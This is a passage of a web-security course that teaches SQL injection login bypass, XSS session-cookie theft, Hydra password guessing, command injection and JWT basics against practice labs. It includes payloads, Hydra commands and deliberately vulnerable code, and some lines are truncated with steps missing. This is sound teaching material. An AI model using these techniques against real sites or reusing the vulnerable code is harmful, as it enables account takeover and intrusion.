cookie is valid. If neither Expires nor Max-Age is specified, the cookie is a session
cookie and is removed when the browser session ends.
Max-Age
The Max-Age directive can be used to specify, in seconds, how long a cookie remains
valid. This is also optional.
Domain
The Domain directive can be used to specify the domain to which the cookie belongs.
A website cannot set this to a domain other than its own, as that would be a security
issue. If Domain is specified, the cookie is also sent to all subdomains of that
domain. For example, testi.hakatemia.fi is a subdomain of hakatemia.fi.
Path
The Path directive restricts the cookie to a specific path. For example, if the Path
value is /x, the cookie is only sent when the browser requests /x or a path
beneath it.
Secure
The Secure directive is a security directive that prevents cookies from being sent
over the unprotected HTTP protocol. If the directive is set, the browser sends the
cookie only over the secure HTTPS protocol.
SameSite
The SameSite directive is a security directive that can prevent cookies from being
sent when the HTTP request originates from a different site than the one receiving it.
This helps mitigate, for example, CSRF (Cross-Site Request Forgery) attacks, where
malicious pages attempt to make changes in other services in which the user has an
active session. SameSite can be set to one of three values: None, Lax, and Strict.
None is the same as not using this feature. Lax withholds the cookie from cross-site
requests except when the user navigates to the site, for example by clicking a link.
Strict also withholds the cookie on navigation through links, which can often break
the usability of the website. If the directive is not set, many modern browsers
default to Lax.
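As an illustration of how these directives end up in an HTTP response, the sketch below builds a Set-Cookie header with Python's standard http.cookies module. The cookie name, value, and lifetime are arbitrary assumptions made for the example, not values used by any course target.

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session"] = "abc123"            # hypothetical cookie name and value
cookie["session"]["max-age"] = 3600     # valid for one hour
cookie["session"]["path"] = "/"         # sent for every path on the site
cookie["session"]["secure"] = True      # only sent over HTTPS
cookie["session"]["httponly"] = True    # not readable via document.cookie
cookie["session"]["samesite"] = "Lax"   # withheld from most cross-site requests

# output() renders the header line a server would add to its response.
header = cookie.output()
print(header)
```

The HttpOnly directive used here is not covered in the list above; it prevents JavaScript from reading the cookie and comes up again in the XSS chapter.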
HTML Markup Language
HTML (HyperText Markup Language) is the markup language used to build web pages.
Unlike programming languages, HTML only informs the browser about the structure and
content of the web page; it does not itself execute code. HTML is one of the
fundamental pillars of web development (and testing) and is therefore very important
to understand for this course.
HTML tells the browser what content to display and how, and this is done with HTML
elements. You can think of HTML elements as Lego bricks that you can combine to
build anything.
For example, we can tell the browser that we want a large text, with an image below it
and a link to Hakatemia's website below that.
<html> <!-- Element indicating the start of the HTML page -->
</html>
You can copy the above HTML code to a file named test.html and open it in your
browser. You will see something similar.
You can also view and edit the HTML code of other pages in your own browser. For
example, with Google Chrome, you can navigate to the desired page, right-click, and
select Inspect.
CSS
CSS (Cascading Style Sheets) is a style language designed to support the content
defined in HTML. Both HTML and CSS are intended to define the visual appearance of
a webpage, where HTML defines the structure and content of the webpage, while CSS
tells the browser how that content should be displayed.
You can, for example, use CSS to define a background image for a website.
<html>
<head>
<!-- The style element tells the browser that its contents ... -->
<style>
body { background-image: url("https://cdn.pixabay.com/p
</style>
</head>
<body>
<h1>Large text</h1>
<a href="https://www.hakatemia.fi/">To Hakatemia!</a>
</body>
</html>
In the module, only a basic understanding of what HTML is and how it works is
provided. You can find more material on HTML, for example, here. There is also an
HTML playground below where you can freely explore the secrets of the HTML
language.
HTML Playground
<h1>Hello everyone.</h1>
JavaScript
JavaScript is primarily a browser-based programming language used to make web
pages more interactive. JavaScript is also used, for example, on the server side and in
phone applications, but in this module we focus only on using JavaScript in browsers.
Every commonly used browser supports JavaScript, which is why most web pages also
use JavaScript to some extent, and this cannot be ignored if you want to learn the
basics of web pages.
JavaScript can be executed in the browser primarily in two different ways: either by
writing JavaScript directly into HTML code or as a separate file.
JavaScript within HTML code. The example in question displays an alert window to the
user, which reads "Hello World!".
<html>
<head>
<title>JavaScript example</title>
<script>
alert("Hello World!");
</script>
</head>
</html>
JavaScript in its own file. This example does the same as the example above. The file
alert.js contains the JavaScript code.
<html>
<head>
<title>JavaScript example</title>
<script src="alert.js"></script>
</head>
</html>
In this module, only a basic understanding of what JavaScript is and how it works is
provided. More information about JavaScript programming can be found, for example,
here.
A few words about the tools
In cybersecurity testing, the purpose of tools is to either automate laborious tasks or
provide better visibility into the usage of the target being tested. Often, both are used.
The choice of tool used in testing depends entirely on the need, usually the target
being tested. Most situations and problems already have the necessary tools written by
someone, but occasionally there may be situations where the need is so unique that
the tester must write their own tool to solve the problem. However, when it comes to
browser-based applications (websites), one of the most commonly used tools in the
field is the BurpSuite software. BurpSuite allows the tester visibility and the ability to
modify the traffic between the browser and the website, as well as several other
functions based on this core idea. You will almost always need the BurpSuite software
when testing websites, so we recommend becoming proficient in using this tool.
Burp Suite: installation
As mentioned in the previous module, Burp Suite allows you to see and modify the
communication between the browser and the website on the fly. This means that the
Burp Suite software needs to be able to come between these two parties. However,
first the software needs to be installed.
BurpSuite Community Installation
There are three different versions of the Burp Suite software:
BurpSuite Community
Free version with limited functions.
BurpSuite Professional
Paid version, which includes, for example, a built-in scanner whose task is to
automatically find vulnerabilities on websites.
Burp Suite Enterprise
Version intended for businesses, which includes even more features, such as the
ability to use the BurpSuite tool programmatically.
We will be using BurpSuite Community version in the platform material. Although the
free version lacks several interesting functionalities, it still includes everything essential
for discovering and exploiting any vulnerabilities.
You can download and install the Burp Suite software from here. Launch the program
after installation. Burp Suite will first ask what kind of project you want to create.
Since we are using the free version of the software, you can only create a temporary
project, so continue by pressing the Next button. Next, the program will ask whether
you want to use its default settings or load a configuration file. The default settings
are fine, so press the Start Burp button.
After the initial stages, the BurpSuite program should start normally.
First look at Burp Suite
Burp Suite contains many different functions and controls, but don't let this
discourage you. You will quickly learn to use it, and you will often find that you only
need a few of its functions in daily use. Next, we will go through a few core functions
that Burp Suite provides and on which the use of the tool is based.
Recording of HTTP messages
Start by going to the Proxy page and clicking the Open Browser button. This opens a
Chromium browser that is preconfigured to route its traffic through Burp Suite. Once
the browser is open, go back to Burp Suite and make sure that the interception of HTTP
requests on the Proxy page is enabled ("Intercept is on"). Then return to the browser
and try to navigate to the address
https://www.hakatemia.fi/.
You will notice that the browser keeps loading the page. Go back to Burp Suite.
The Proxy page should now display the HTTP request we caused.
The Proxy is now in "Intercept is on" mode, which means that every message sent by the
browser is intercepted and displayed to the user. We can modify the request, drop it,
or forward it to the website using the Forward button.
We can also set the Proxy to passive mode. In passive mode, it does not stop messages
but instead records each message and forwards it automatically. Switch to passive
mode by pressing the Intercept is on button.
Note that https://www.hakatemia.fi now loads successfully in the browser.
Next, go to the Target page. On the left, you will see a list of all the websites that the
browser has made requests to.
Target identification
Notice that navigating to the Hakatemia website caused multiple requests. This is
because the Hakatemia website uses various resources that are hosted on other
websites.
These resources can include, for example, images, videos, style sheets, JavaScript
libraries, etc.
Because websites often depend on many resources that are loaded from other addresses,
it is more practical to set Burp Suite to focus only on specific websites, as we do
not want to accidentally test the wrong website.
Set Burp Suite to focus only on the desired target by right-clicking
https://www.hakatemia.fi in the list of addresses on the left side of the page and
selecting Add to scope. Burp Suite will then ask whether you want to stop recording
traffic from other websites, to which you can answer Yes.
Now we have defined the target, meaning that the BurpSuite program no longer saves
traffic caused by other websites. Next, we want to display only the Hakatemia website
on the Target page. Press the Filter button, select the Show only in-scope items box,
and press the Apply button to save the filtering setting.
Expand the tree structure that Burp Suite has recorded for the website
www.hakatemia.fi by clicking the arrow to the left of it in the list.
Repeater
One of the most commonly used tools in the BurpSuite program is the Repeater
functionality. With this, we can easily modify and send HTTP requests and see how the
website responds to these requests.
You can transfer an HTTP request to the Repeater page by right-clicking on the HTTP
request saved by the BurpSuite application and selecting Send to Repeater.
After this, go to the Repeater page. You will see the selected request on the left side
and an empty response view on the right side. Press the Send button. This instructs
Burp Suite to send the corresponding HTTP request to the website and retrieve the
response.
Next, try modifying the HTTP request by editing the resource path after the GET
method and setting the path to /test.
Note that the requested page cannot be found on the website
https://www.hakatemia.fi, so the website returns the HTTP response 404 Not
Found.
Summary
We have now gone through how to install BurpSuite program and how to use it to
capture and replay browser-made HTTP requests.
We strongly recommend boldly experimenting with the different functionalities of the
tool and freely searching for more information on the possibilities offered by the tool.
Vulnerabilities
A vulnerability is a weakness or deficiency that allows an attacker to do something
in the system that its developers did not intend to be possible.
Vulnerabilities are usually exploited to steal information or cause harm, either to
individual users or on a broader level, such as by crashing a website. Sometimes the
goal of exploiting a vulnerability is to gain control over the system, which is then
used only as a tool in larger attacks against other applications or organizations.
However, it is important to understand that vulnerability and hacking are to some extent
subjective and situation-dependent definitions. A vulnerability in one system can
sometimes be functionality in another system. For this reason, it is important to
understand the system functionalities and have enough knowledge of the "context" to
be able to identify anomalies.
Since there are relatively many different vulnerabilities, but the natures of vulnerabilities
are very similar, we have done our best to condense vulnerabilities into five different
groups.
2 - SQL injections
Injection
Injection usually refers to a vulnerability through which an attacker sends input to an
application that breaks or changes the structure of a query controlled by the
application. Good examples of these are SQL injection vulnerability, where an attacker
manipulates a database query executed by the application, and XSS injection, where an
attacker manipulates the structure of an HTML response returned by a web
application. A common requirement in injection vulnerabilities is that the application
does not properly validate or sanitize user input and uses it in some form.
Access control
Vulnerabilities related to access control always refer to broken access control. In
essence, if a user is able to access functions or see information that they should not be
able to see, it is a case of inadequate access control or a vulnerability in access control.
Concrete vulnerabilities related to access control include, among others, IDOR
vulnerabilities (Insecure Direct Object Reference), where user-controlled identifiers are
used directly in handling a resource. It is an IDOR vulnerability if a user is able to
manipulate this identifier to directly access a resource that they are not supposed to
access. Access control also often refers to horizontal and vertical restrictions, where
horizontal refers to a restriction that prevents access to another user's information
within the same category, and vertical refers to restrictions between regular and higher
authority (Regular user vs. Administrator).
Authentication
Vulnerabilities related to authentication are deficiencies in the login process. Is
the login check performed in the browser with JavaScript, or are the credentials
verified securely on the server side? Can an attacker perform automated login
attempts and thus programmatically guess thousands of passwords? Bypassing
two-factor authentication would also be a vulnerability in this category.
Session management
Session management deficiencies or vulnerabilities can include, for example, the
predictability of the identifier used for maintaining the session. If the identifiers used
after login are guessable, it is possible for an attacker to hijack the session. A good
example is the "Break into a website" task used in this course, where the session
cookie is not secure but easily guessable.
Misunderstanding of protocols
Protocol misunderstanding refers to a situation where developers use technologies
without understanding their underlying functionality. A good example of this is XXE
(XML External Entity) vulnerabilities, where little-known features of XML can be used
by attackers to carry out various attacks. Another example is the use of PDF
generators, which can sometimes execute HTML or JavaScript code on the server side,
allowing an attacker to steal files from the server or conduct other attacks.
What is SQL?
SQL (Structured Query Language) is a general query language used by applications to
communicate with their databases. Applications use databases to store and retrieve
data.
Let's go through a few basics. Below is a carefully selected list of things that hackers
specifically need for SQL injection attacks.
Simple example
Here is a query that retrieves (SELECT) the name and email columns (name, email)
from the users table (FROM users).
SQL Playground
SELECT name, email FROM users
All columns
If you want to return all columns, write an asterisk (*) in place of the column list.
SQL Playground
SELECT * FROM users
Sorting of Results
If you want to sort the results by the user's name, you can do so with the
ORDER BY clause.
SQL Playground
SELECT * FROM users ORDER BY name
The ORDER BY clause can be followed by a sort direction: ascending (ASC, the default)
or descending (DESC).
SQL Playground
SELECT * FROM users ORDER BY name DESC
ORDER BY can also take a number, such as 1, which would mean "order by the first
column" (which happens to be id in the query).
SQL Playground
SELECT id, name FROM users ORDER BY 1
Combining Queries
If you want to perform two queries, for example "names of all users" and "names of all
animals", and return the combined results of both, you can use the UNION operator
(UNION SELECT).
SQL Playground
SELECT name FROM users UNION SELECT name FROM animals
Comments
In an SQL query, a comment can be started with the -- characters. They end the
query, and the rest of the line is interpreted as a note, not as SQL. Note that the --
should always be followed by a space. Some databases, such as MySQL, otherwise
reject the query as malformed (it may go through in this simulated SQL environment,
but in a real database it often will not).
SQL Playground
SELECT * FROM users -- This query retrieves all users
Depending on the database, comments can sometimes also be started with a hash
sign (#).
It is also possible to open and close a comment in the middle of a query using the
format /* comment */.
SQL Playground
SELECT * FROM /* Tämä kommentti on vähän hassussa paikassa mu
When the user tries to log in with the address john.doe@example.com and the correct
password (s3cr3t), the database returns one row and the application logs the user in
with the corresponding username contained in that row. Everything works correctly at
this stage.
SQL Playground
SELECT id FROM users WHERE email='john.doe@example.com' AND p
When the user tries to login with the wrong password, the database does not return
any rows, and the user is given an error message stating that the login failed.
Everything continues to work as it should.
SQL Playground
SELECT id FROM users WHERE email='john.doe@example.com' AND p
But what happens if the user enters a password containing a single quote (')? The
query no longer works, and the application crashes because the SQL is suddenly
malformed and the database query fails. There is one quote too many: the database
server expected a matching closing quote for the new one as well. If you send a single
quote (or a double quote) to an application and receive an error message back,
always suspect an SQL injection vulnerability.
SQL Playground
SELECT id FROM users WHERE email='john.doe@example.com' AND p
What if the attacker modifies the SQL to the format they want and manages to make it
work again? What if the user entered the password kissa' OR 1=1--?
SQL Playground
SELECT id FROM users WHERE email='john.doe@example.com' AND p
The query suddenly returns all users from the database, and the application
incorrectly logs the attacker in as the first user that the database happened to return,
even though the password was not correct. 1=1 is always true, so every row was
returned, and the closing quote added by the application was commented out so that it
could not break the structure of the query.
This was a simple, and one could say, a very classic example of an SQL injection
vulnerability. We will go through numerous techniques in the course to find and exploit
this vulnerability.
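The behaviour described above can be reproduced locally. The sketch below uses Python's built-in sqlite3 module with an in-memory database; the table layout, the password column name, and the sample rows are assumptions made for illustration, since the queries shown in the course material are truncated. Passwords are stored in plain text only to keep the demonstration short.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
conn.executemany(
    "INSERT INTO users (email, password) VALUES (?, ?)",
    [("admin@example.com", "hunter2"), ("john.doe@example.com", "s3cr3t")],
)


def vulnerable_login(email, password):
    # UNSAFE on purpose: user input is concatenated straight into the SQL text.
    query = (
        "SELECT id FROM users WHERE email='" + email
        + "' AND password='" + password + "'"
    )
    return conn.execute(query).fetchall()


email = "john.doe@example.com"
print("correct password:", vulnerable_login(email, "s3cr3t"))
print("wrong password:  ", vulnerable_login(email, "wrong"))

try:
    vulnerable_login(email, "'")  # one quote too many breaks the SQL syntax
except sqlite3.OperationalError as error:
    print("single quote:    ", "database error:", error)

# The injected OR 1=1 matches every row; the trailing comment hides the
# closing quote that the application appends.
print("injection:       ", vulnerable_login(email, "kissa' OR 1=1-- "))
```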
How to protect against the vulnerability?
The best way is not to build SQL manually at all and to let a modern programming
library (an ORM, Object-Relational Mapper) handle the low-level communication with
the database. Another option is to use parameterized queries (prepared statements),
where the database library handles dangerous characters safely. In this case, for
example, it was the quote character that let the input "escape" from the string
and interfere with the structure of the query.
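A minimal sketch of the parameterized approach, again using Python's built-in sqlite3 module. The table layout and sample user are assumptions for illustration, and a real application would store password hashes rather than plain-text passwords.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
conn.execute(
    "INSERT INTO users (email, password) VALUES (?, ?)",
    ("john.doe@example.com", "s3cr3t"),
)


def safe_login(email, password):
    # The ? placeholders keep the SQL structure fixed. The values are passed
    # separately, so quotes in the input are treated as data, not as SQL.
    row = conn.execute(
        "SELECT id FROM users WHERE email = ? AND password = ?",
        (email, password),
    ).fetchone()
    return row[0] if row else None


print(safe_login("john.doe@example.com", "s3cr3t"))            # valid login
print(safe_login("john.doe@example.com", "kissa' OR 1=1-- "))  # injection attempt
print(safe_login("john.doe@example.com", "'"))                 # lone quote, no crash
```

With placeholders, the injection string is simply compared against the stored password as an ordinary value, so it neither logs the attacker in nor breaks the query.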
3 - XSS (Cross-Site Scripting)
Cross-Site Scripting (XSS) is a vulnerability that allows malicious JavaScript code to be
injected into trusted websites. This enables the execution of malicious code in the
browsers of users who use the site.
XSS vulnerabilities occur when untrusted input is not properly handled and is returned
to the browser as is. As a result, the browser interprets the input as code on the client
side. Such input can be, for example, an open comment on a discussion forum.
The image below is an example of what a successful XSS attack could look like. The
attacker discovers an XSS vulnerability on the website, saves malicious JavaScript
code on the site, and when the user(s) visit the infected site, the code is executed,
allowing the attacker to steal the desired information.
Example of a vulnerable solution
Here is a PHP script that is vulnerable to XSS attacks.
echo "<p>Hakutulokset haulle: " . $_GET['haku'] . "</p>";
It is vulnerable because it builds HTML unsafely: the URL parameter haku is not
encoded before it is placed in the page. An attacker can create a link like the
following, which executes the attacker's JavaScript code on the website when the
target opens it:
https://www.example.com/?haku=<script>alert('XSS')</script>
Opening the link causes the browser to render the following HTML and execute the script it contains:
<p>
Hakutulokset haulle:
<script>
alert('XSS')
</script>
</p>
XSS Vulnerability Categories
XSS vulnerabilities are often classified into categories based on the following questions:
Does the malicious JavaScript code injected by the attacker "stay" on the page, for
example in a message on a discussion forum? This is called stored or persistent XSS.
Is the harmful code only reflected back once, when the target of the attack opens a
maliciously crafted link? This is called reflected XSS.
Or, regardless of these two, does the vulnerability exist solely in JavaScript code
that, for example, handles the URL fragment (anchor) in the browser unsafely? These
are usually referred to as DOM-based XSS vulnerabilities.
Various situations when XSS vulnerabilities occur
The vulnerability typically arises for one of the following reasons:
Inadequate encoding: The application constructs HTML unsafely
(parameterization without proper encoding).
WYSIWYG editors: The application allows users to directly edit the website's
HTML code (for example, WYSIWYG editors).
File uploads: The application allows users to send HTML/SVG files and serves them
back unsafely.
Vulnerable components: The application uses outdated and vulnerable JavaScript
libraries.
eval() and its partners: The application uses JavaScript insecurely by inputting
untrusted data into functions that execute code directly from a string (such as eval).
Links:
XSS vulnerabilities can be found practically anywhere, where it is possible for the
application user to input something into the application, which the application returns
back to the browser at some point. The first step in finding such vulnerability is to send
input to the application and search for a place in the HTML code where the input is
reflected.
Start by sending a message to the chat and finding it in the HTML response.
You can, for example, use the search field provided by Burp Suite to find your message
from the HTML code.
Next, send HTML input to the application. If the application is not vulnerable, it
converts HTML characters such as < and > into the safe forms &lt; and &gt;. If the
application is vulnerable, the characters remain as they are in the HTML response,
allowing you to make arbitrary modifications to the application's HTML code.
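The difference between the two behaviours can be sketched in a few lines of Python using the standard html.escape function. The function names and the page fragment are hypothetical and only mirror the idea of the earlier search-results example; they are not code from the target application.

```python
from html import escape


def render_unsafe(search_term: str) -> str:
    # Vulnerable: the input is placed into the HTML as is.
    return "<p>Search results for: " + search_term + "</p>"


def render_safe(search_term: str) -> str:
    # Not vulnerable: <, >, & and quotes are converted to HTML entities first.
    return "<p>Search results for: " + escape(search_term) + "</p>"


payload = "<script>alert('XSS')</script>"
print(render_unsafe(payload))  # the script element survives intact
print(render_safe(payload))    # the browser would show the payload as plain text
print(escape("<b>hello</b>"))
```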
In the image below, we enter <b>hello</b> and find that the application is vulnerable.
Note that the input is URL-encoded.
This allows us to confirm that this website is vulnerable. Next, we will attempt to exploit
this vulnerability and steal the session cookies of the admin user.
Adding JavaScript code to the page
First, let's make sure that we can input JavaScript code into the page using the
traditional <script> element. For example, in security audits, a common Proof of
Concept (PoC) is to display a JavaScript alert like this:
<script>alert(1)</script>
When you get the alert box visible on the page, you have verified the vulnerability as
well as the ability to use JavaScript code in the attack. Next, let's see how the
vulnerability could be exploited.
Reading Session Token
If the application uses cookies for session management and has not protected the
cookie with the HttpOnly directive (which prevents JavaScript code from accessing
the cookie), the session identifier can be read through the document.cookie property
as follows:
<script>alert(document.cookie)</script>
POST / HTTP/1.1
Host: www-yv2kdqpzkf.ha-target.com
...
message=moi
RESPONSE
HTTP/1.1 200 OK
...
We wait for the administrator to visit the page again, at which point the
administrator's browser should send their session ID in a message.
Note that your browser also sends your own session ID every time you reload the page,
as you are exposed to the attack in the same way as the administrator.
Step 4: Adding the stolen session token to your own browser
We open a new incognito window and add the administrator's cookie to the
browser. The simplest way to do this is to open the JavaScript console and set the
administrator's cookie as our own.
document.cookie = "SessionId=.eJ...";
Finally, we refresh the page and confirm that we are logged in as the system
administrator.
4 - Dictionary attacks against passwords
A dictionary attack is very simple. We take a username and a list of common or likely
passwords, and then attempt to log in with each password in the list.
Exercise
There are several ways to perform this type of attack. In this exercise, we will use a
password list found at the path /usr/share/wordlists/common-passwords.txt on the
practice machine and a command-line tool called THC Hydra to automate the guessing
process.
Preparation
Let's find out what kind of HTTP request is sent for a login attempt and how to
distinguish a successful or failed login from the HTTP response.
Start by logging into the application and then find the login request from Burp's HTTP
history:
Send the request with the correct password first and examine the HTTP response. We
can conclude that a successful login response, for example:
Returns HTTP status code 302
Body contains the text "Redirecting..."
It is about 200 characters long.
HTTP REQUEST
email=student%40ha-target.com&password=student
RESPONSE
Send the same request with the wrong password. We can conclude that a failed login
response, for example:
Returns HTTP status code 200
Body contains "Invalid username or password"
It is about 5000 characters long.
HTTP REQUEST
email=student%40ha-target.com&password=EiOikeaSalasana
RESPONSE
HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 4933
Location: http://www-0xrue3l19e.ha-target.com/
Set-Cookie: session=.eJw...; HttpOnly; Path=/
...
...
<strong class="font-bold">Oops!</strong>
<span class="block sm:inline pr-5">Invalid username or passw
...
Finally, examine the HTTP request itself. It is a POST request to the path /login, with a
content type of application/x-www-form-urlencoded and two parameters in the
body: email (user's email address) and password (user's password).
With this information, we can move forward!
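The observations above can be summarised in code. The sketch below builds the urlencoded body with Python's standard urllib.parse module and classifies a response using the failure text seen in the example response. The helper names are hypothetical, and no request is sent anywhere.

```python
from urllib.parse import urlencode


def build_login_body(email: str, password: str) -> str:
    # application/x-www-form-urlencoded: key=value pairs joined with &,
    # with special characters such as @ percent-encoded.
    return urlencode({"email": email, "password": password})


def looks_like_failed_login(status_code: int, body: str) -> bool:
    # Based on the example responses: a failed login returns status 200 and
    # contains this error text, while a successful login redirects with 302.
    return status_code == 200 and "Invalid username or password" in body


print(build_login_body("student@ha-target.com", "student"))
print(looks_like_failed_login(200, "<span>Invalid username or password</span>"))
print(looks_like_failed_login(302, "Redirecting..."))
```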
Hydra configuration
The syntax of Hydra in this case is as follows:
hydra -t <power (threads)> -l <username> -p <password> <domain> <module> "<path>:<body>:F=<text that signifies failed login>"
-l can be replaced with a capital -L, which takes a file with multiple usernames instead
of a single username. Similarly, -p can be replaced with a capital -P, which takes a
password list. However, let's first try with just one username and password,
specifically your own, to ensure that Hydra works correctly.
-t 4 is an appropriate power level to prevent the lab from crashing. The default value is
16, which can be heavy for the application.
In the body, the places where the username and password are inserted are marked with
the placeholders ^USER^ and ^PASS^.
Username: student@ha-target.com
Password: student
Domain: Your lab's domain, e.g. www-0xrue3l19e.ha-target.com
Module: https-post-form (Hydra module that handles urlencoded HTTPS POST
forms)
Path: /login
Body: email=^USER^&password=^PASS^
Failed Login: Invalid (HTTP response indicating a failed login attempt, contains the
text "Invalid")
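As a sketch of how the last three values fit together, the following Python snippet joins the path, body and failure text into the colon-separated form argument described in the syntax above. The helper name hydra_form_argument is hypothetical and exists only for illustration; it does not run Hydra.

```python
def hydra_form_argument(path: str, body: str, failure_text: str) -> str:
    """Join path, body and failure marker as "<path>:<body>:F=<text>"."""
    return f"{path}:{body}:F={failure_text}"


argument = hydra_form_argument("/login", "email=^USER^&password=^PASS^", "Invalid")
print(argument)  # /login:email=^USER^&password=^PASS^:F=Invalid
```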
You could thus run Hydra roughly like this:
hydra -t 4 -l "student@ha-target.com" -p student www-0xrue3l
If the test succeeds, try the wrong password next. This time Hydra should not report a
valid login.
hydra -t 4 -l "student@ha-target.com" -p EiOikeaSalasana www
Initiating an Attack
To initiate the actual attack, we make two changes to the Hydra command.
We change the username to the email address of the target of the attack, which in
this case is jessica.blanchard@ha-target.com (in your lab, the admin's email address
can be found on the lab homepage).
Instead of using a password (-p), we use a password list (-P) that is located in the
path /usr/share/wordlists/common-passwords.txt
hydra -t 4 -l "jessica.blanchard@ha-target.com" -P /usr/share
Then just wait a moment while Hydra goes through the password list. If you're lucky,
you'll get the admin user's password!
5 - Command Injections
Operating System Commands
In practice, almost all operating systems have some kind of command prompt or
text-based user interface. In Windows, it is called the Command Prompt (cmd.exe) or
PowerShell; in Linux and macOS it is a shell such as bash, sh, or zsh. These command
prompts can be used to launch text-based programs and commands. For example, we can
ping Google:
$ ping google.com
PING google.com (209.85.233.101) 56(84) bytes of data.
64 bytes from lr-in-f101.1e100.net (209.85.233.101): icmp_seq
Operating System Commands in Programming
Sometimes applications use console tools in the background. We could have, for
example, a web application built with Python that aims to ping a certain IP address and
display the result of the ping on the website. The example code might look like this:
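import os

def do_GET(request):
    # The "ip" parameter comes straight from the user.
    ip = request.get_parameter("ip")
    # Vulnerable: the value is pasted into a shell command unchanged.
    result = os.popen(f"ping -c1 {ip}").read()
    return {"result": result}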
Injection
The problem here is that adding user input to an operating system command is
terrifyingly dangerous. By adding certain special characters to the "IP address," an
attacker can trick the application into running completely different operating system
commands than just ping.
Command substitution
Let's take command substitution, which can be used to include the output of another
command as part of a command. Substitution can be done using the syntax
$(command) or `command`.
$ pwd
/tmp
$ echo "pwd on: $(pwd)"
pwd on: /tmp
$ echo "pwd on: `pwd`"
pwd on: /tmp
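To connect command substitution with the ping example, here is a minimal sketch that only builds commands and never executes them. The function names are hypothetical. The safer variant assumes the input must be a literal IP address and that the program would be started from an argument list (for example with subprocess.run) instead of a shell string.

```python
import ipaddress
from typing import List


def unsafe_ping_command(ip: str) -> str:
    """Build the command the way the vulnerable example does (a shell string)."""
    return f"ping -c1 {ip}"


def safe_ping_argv(ip: str) -> List[str]:
    """Validate the input as an IP address and return an argument list."""
    address = ipaddress.ip_address(ip)  # raises ValueError for anything else
    # An argument list can be run without a shell, so characters such as
    # $( ) or backticks have no special meaning.
    return ["ping", "-c1", str(address)]


malicious = "127.0.0.1 $(whoami)"
print(unsafe_ping_command(malicious))  # a shell would run whoami first

try:
    safe_ping_argv(malicious)
except ValueError as error:
    print("rejected:", error)

print(safe_ping_argv("127.0.0.1"))
```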
Thought Exercise
The lab contains a web diagnostics tool that checks whether a website is up. Behind the
scenes, the tool uses the curl command. You can see from the top of the page what
commands are executed on the server. How would you start an attack?
6 - JWT 'None' Algorithm Attack
What on earth is JWT?
JWT is an abbreviation for JSON Web Token, which refers to a very common way of
transmitting small amounts of data between a browser and a server, or between
information systems, in digitally signed format.
JWT tokens usually look like this:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZS
If you look closely, you will notice that the token has three parts separated by periods.
First part: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
Second part:
eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5M
Third part: SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
All parts of the token are base64-encoded (more precisely base64url, a URL-safe variant
without padding). Base64 is a widely used method to transform any type of data into a
format consisting of 64 different characters, and back.
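As a small sketch, a part of the token can be decoded with Python's standard library. The helper name decode_jwt_part is hypothetical. It assumes the part contains JSON, which holds for the first two parts but not for the signature.

```python
import base64
import json


def decode_jwt_part(part: str) -> dict:
    """Decode one base64url-encoded JSON part of a JWT."""
    # JWTs drop the trailing "=" padding, so restore it before decoding.
    padded = part + "=" * (-len(part) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))


header = decode_jwt_part("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9")
print(header)  # {'alg': 'HS256', 'typ': 'JWT'}
```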
Part 1: JOSE-Header
The first part of the token is the JOSE (JavaScript Object Signing and Encryption)
header, which contains information such as the signature or encryption algorithm of
the token.
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 is decoded as (base64):
{"alg":"HS256","typ":"JWT"}
alg: Signing/encryption algorithm. HS256 refers to the algorithm "HMAC with SHA-256",
which is a symmetric signing algorithm, meaning that the digital signature is
generated and verified using the same secret key.
typ: The type of the token. Not used for much, the value is usually JWT.
Part 2: Data
The second part contains the token's information (also referred to as the token's data
or payload).
eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5M
is decoded as (base64):
{"sub":"1234567890","name":"John Doe","iat":1516239022}
The data section information is also referred to as "claims". Typically, the token
contains some sort of user identifier, possibly a list of user rights, and usually also
includes information about when the token was created and when it expires.
The following claims are included in the example token:
sub: "Subject", in this case the user's identifier.
name: The user's name.
iat: "Issued at", an epoch timestamp that indicates when the token was issued.
Often you also see the following claims:
iss: "Issuer", who has issued the token.
aud: "Audience", the recipient the token is intended for.
exp: "Expiration time", an epoch timestamp indicating when the token expires.
nbf: "Not before", when the token becomes valid.
jti: "JWT ID" - Unique identifier for this token. Can be used, for example, to prevent
the same token from being used again or to revoke (disable) the issued token.
Part 3: Signature
The third part of a JWT token is a digital signature.
SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c, when base64-decoded, yields raw
binary bytes that do not form readable text. So it's gibberish.
As the algorithm is HS256, which is HMAC + SHA256, the digital signature is formed as
follows, in simplified terms:
A: Take Part 1, the JOSE header, and base64-encode it.
B: Take Part 2, the token data, and base64-encode it.
C: Join A and B with a period. The result, which is the message to be signed, looks like
this:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZS
D: Take the secret key K and combine it with the message to be signed, C.
E: Run the combination of K and C through a hash algorithm (in this case SHA256) to
obtain the final digital signature.
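The steps above can be sketched with Python's hmac module. Note that real HMAC mixes the key and message in a more involved way than plain concatenation, and the library takes care of that. The key and the shortened payload below are made up for illustration and do not come from the lab.

```python
import base64
import hashlib
import hmac


def b64url(data: bytes) -> str:
    """Base64url-encode without padding, as JWTs do."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def sign_hs256(signing_input: str, key: bytes) -> str:
    """Compute the HS256 signature part for "<header>.<payload>"."""
    digest = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return b64url(digest)


header = b64url(b'{"alg":"HS256","typ":"JWT"}')   # step A
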